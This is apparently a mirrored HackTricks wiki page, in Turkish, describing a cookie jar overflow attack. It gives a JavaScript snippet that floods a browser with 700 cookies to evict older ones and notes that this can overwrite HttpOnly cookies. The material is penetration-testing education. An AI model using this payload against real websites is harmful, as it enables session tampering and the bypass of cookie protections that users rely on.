maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

23 lines
1.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{{#include ../../banners/hacktricks-training.md}}
Tarayıcıların bir sayfa için saklayabileceği **çerez sayısında bir sınırı** vardır. Eğer bir nedenle **bir çerezi kaybetmeniz** gerekiyorsa, **çerez kavanozunu taşırarak** en eski olanların silinmesini sağlayabilirsiniz:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Üçüncü taraf çerezlerinin farklı bir alan adına işaret ettiğini ve üzerine yazılmayacağını unutmayın.
> [!CAUTION]
> Bu saldırı, **HttpOnly çerezlerini silip ardından istediğiniz değerle sıfırlayarak üzerine yazmak için de kullanılabilir**.
>
> Bunu [**bu laboratuvar içeren yazıda**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/) kontrol edin.
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink